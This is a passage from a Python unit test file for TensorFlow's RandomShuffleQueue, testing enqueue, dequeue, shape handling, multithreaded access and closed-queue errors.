tf_logging.error("Finished: %s", self._testMethodName)
def testEnqueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
self.assertAllEqual(0, q.size())
enqueue_op.run()
self.assertAllEqual(1, q.size())
def testEnqueueWithShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=tensor_shape.TensorShape([3, 2]))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
self.assertAllEqual(1, q.size())
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
def testEnqueueManyWithShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertAllEqual(4, q.size())
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shapes=tensor_shape.TensorShape([3]))
q2.enqueue(([1, 2, 3],))
q2.enqueue_many(([[1, 2, 3]],))
def testScalarShapes(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (1,)])
q.enqueue_many([[1, 2, 3, 4], [[5], [6], [7], [8]]]).run()
q.enqueue([9, [10]]).run()
dequeue_t = q.dequeue()
results = []
for _ in range(2):
a, b = self.evaluate(dequeue_t)
results.append((a, b))
a, b = self.evaluate(q.dequeue_many(3))
for i in range(3):
results.append((a[i], b[i]))
self.assertItemsEqual([(1, [5]), (2, [6]), (3, [7]), (4, [8]), (9, [10])],
results)
def testParallelEnqueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
self.evaluate(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
vals = [dequeued_t.eval() for _ in xrange(len(elems))]
self.assertItemsEqual(elems, vals)
def testEnqueueAndBlockingDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(3, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
self.evaluate(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(self.evaluate(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, results)
def testMultiEnqueueAndDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.int32, dtypes_lib.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
results = []
for _ in xrange(len(elems)):
x, y = self.evaluate(dequeued_t)
results.append((x, y))
self.assertItemsEqual(elems, results)
def testQueueSizeEmpty(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
self.assertEqual(0, q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual([1], self.evaluate(size))
dequeued_t.op.run()
self.assertEqual([0], self.evaluate(size))
def testEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + elems, results)
def testEmptyEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual(0, self.evaluate(size_t))
enqueue_op.run()
self.assertEqual(0, self.evaluate(size_t))
def testEmptyDequeueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueUpTo(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueManyWithNoShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_many(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueMany
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
def testEmptyDequeueUpToWithNoShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_up_to(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueUpTo
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
def testMultiEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
float_val, int_val = self.evaluate(dequeued_t)
results.append((float_val, [int_val[0], int_val[1]]))
expected = list(zip(float_elems, int_elems)) * 2
self.assertItemsEqual(expected, results)
def testDequeueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(5)
enqueue_op.run()
results = self.evaluate(dequeued_t).tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testDequeueUpToNoBlocking(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(5)
enqueue_op.run()
results = self.evaluate(dequeued_t).tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testMultiDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = self.evaluate(dequeued_t)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testMultiDequeueUpToNoBlocking(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_up_to(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = self.evaluate(dequeued_t)
# dequeue_up_to has undefined shape.
self.assertEqual([None], dequeued_t[0].get_shape().as_list())
self.assertEqual([None, 2], dequeued_t[1].get_shape().as_list())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testHighDimension(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.int32, (
(4, 4, 4, 4)))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertItemsEqual(dequeued_t.eval().tolist(), elems.tolist())
def testParallelEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
self.evaluate(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpToRandomPartition(self):
with self.cached_session() as sess:
dequeue_sizes = [random.randint(50, 150) for _ in xrange(10)]
total_elements = sum(dequeue_sizes)
q = data_flow_ops.RandomShuffleQueue(
total_elements, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in xrange(total_elements)]
enqueue_op = q.enqueue_many((elems,))
dequeue_ops = [q.dequeue_up_to(size) for size in dequeue_sizes]
enqueue_op.run()
# Dequeue random number of items in parallel on 10 threads.
dequeued_elems = []
def dequeue(dequeue_op):
dequeued_elems.extend(self.evaluate(dequeue_op))
threads = []
for dequeue_op in dequeue_ops:
threads.append(self.checkedThread(target=dequeue, args=(dequeue_op,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueUpToWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesUpTo
# that number of elements.
dequeued_t = q.dequeue_up_to(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
results = [dequeued_t.eval() for _ in elems]
expected = [[elem] for elem in elems]
self.assertItemsEqual(expected, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegex(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
def testBlockingDequeueFromClosedQueue(self):
with self.cached_session() as sess:
min_size = 2
q = data_flow_ops.RandomShuffleQueue(10, min_size, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
results = []
# Manually dequeue until we hit min_size.
results.append(self.evaluate(dequeued_t))
results.append(self.evaluate(dequeued_t))
def blocking_dequeue():
results.append(self.evaluate(dequeued_t))
results.append(self.evaluate(dequeued_t))
self.assertItemsEqual(elems, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegex(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=blocking_dequeue)
dequeue_thread.start()
time.sleep(0.1)
# The dequeue thread blocked when it hit the min_size requirement.
self.assertEqual(len(results), 2)
close_op.run()
dequeue_thread.join()
# Once the queue is closed, the min_size requirement is lifted.
self.assertEqual(len(results), 4)
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
close_op = q.close()
dequeued_t = q.dequeue()
finished = [] # Needs to be a mutable type
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegex(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
finished.append(True)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(finished), 0)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(finished), 1)
def testBlockingDequeueManyFromClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
progress = [] # Must be mutable
def dequeue():
self.assertItemsEqual(elems, self.evaluate(dequeued_t))
progress.append(1)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegex(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
progress.append(2)
self.assertEqual(len(progress), 0)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
for _ in range(100):
time.sleep(0.01)
if len(progress) == 1:
break
self.assertEqual(len(progress), 1)
time.sleep(0.01)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(progress), 2)
def testBlockingDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(self.evaluate(dequeued_t))
self.assertEqual(3, len(results))
results.extend(self.evaluate(dequeued_t))
self.assertEqual(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueUpToSmallerThanMinAfterDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
capacity=10,
min_after_dequeue=2,
dtypes=dtypes_lib.float32,
shapes=((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(self.evaluate(dequeued_t))
self.assertEqual(3, len(results))
# min_after_dequeue is 2, we ask for 3 elements, and we end up only
# getting the remaining 1.
results.extend(self.evaluate(dequeued_t))
self.assertEqual(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueManyFromClosedQueueWithElementsRemaining(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue_many(q.size())
enqueue_op.run()
results = []
def dequeue():
results.extend(self.evaluate(dequeued_t))
self.assertEqual(len(results), 3)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegex(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
# While the last dequeue failed, we want to ensure that it returns
# any elements that it potentially reserved to dequeue. Thus the
# next cleanup should return a single element.
results.extend(self.evaluate(cleanup_dequeue_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(results), 4)
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegex(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegex(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 4, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegex(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegex(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0], results)
# There wasn't room for 50.0 in the queue when the first element was
# dequeued.
self.assertNotEqual(50.0, results[0])
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
time.sleep(0.01)
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0, 60.0], results)
# There wasn't room for 50.0 or 60.0 in the queue when the first
# element was dequeued.
self.assertNotEqual(50.0, results[0])
self.assertNotEqual(60.0, results[0])
# Similarly for 60.0 and the second element.
self.assertNotEqual(60.0, results[1])
thread.join()
def testBlockingEnqueueToClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed since it will complete
# before the queue is closed.
self.evaluate(blocking_enqueue_op)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegex(errors_impl.CancelledError, "closed"):
self.evaluate(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The close_op should run after the first blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def blocking_close():
self.evaluate(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Wait for the close op to block before unblocking the enqueue.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
# Dequeue to unblock the first blocking_enqueue_op, after which the
# close will complete.
results.append(dequeued_t.eval())
self.assertTrue(results[0] in elems)
thread2.join()
thread1.join()
def testBlockingEnqueueManyToClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
size_t = q.size()
enqueue_op.run()
self.assertEqual(size_t.eval(), 3)
def blocking_enqueue():
# This will block until the dequeue after the close.
self.evaluate(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# First blocking_enqueue_op of blocking_enqueue has enqueued 1 of 2
# elements, and is blocked waiting for one more element to be dequeued.
for i in range(50):
queue_size = self.evaluate(size_t)
